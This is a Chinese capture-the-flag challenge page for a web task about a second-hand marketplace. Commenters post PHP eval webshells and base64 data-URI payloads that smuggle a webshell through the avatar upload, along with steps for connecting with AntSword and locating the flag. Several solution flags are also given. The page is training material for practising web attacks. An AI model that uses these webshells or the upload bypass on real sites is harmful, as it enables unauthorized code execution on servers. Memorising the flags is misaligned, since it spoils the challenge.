xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 1994
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
BlueL1ght 1月前

<?php echo `$_POST[a]`;?>

回复 0

Daniel2023 2月前

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=

回复 0

vchopin 4月前

base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上

回复 0

XRain 7月前

实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。

回复 0

不会编程的崽 7月前

我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。

回复 0

三碗不过杠 7月前

flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base

回复 1

冯飞99 10月前

这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}

回复 1

wxy1343 10月前

flag{412d5e0844a33f36c9aa3d688425fb9f}

回复 0

ctfliu 11月前

image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag

回复 0

五无心惘然 1年前

别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了

回复 0

WriteUp

image
nic016

5 金币

评分(7)

解题动态

gyssong 攻破了该题 19小时前
liqliq 攻破了该题 1天前
OldWolfofFarron 攻破了该题 2天前
15826978220 攻破了该题 4天前
chang123 攻破了该题 7天前
0DayHP 攻破了该题 8天前
adminhrp 攻破了该题 10天前
t0ur1st 攻破了该题 12天前
TwTsaltfish 攻破了该题 16天前
15575401591 攻破了该题 18天前
白牧羊人 攻破了该题 18天前
Lunalalala 攻破了该题 20天前
lwq522725 攻破了该题 20天前
2362821788 攻破了该题 22天前
B1ng0Sec 攻破了该题 25天前
网络小梦 攻破了该题 25天前
网络小钦 攻破了该题 25天前
JTY111 攻破了该题 25天前
hsjj 攻破了该题 26天前
18835780752 攻破了该题 27天前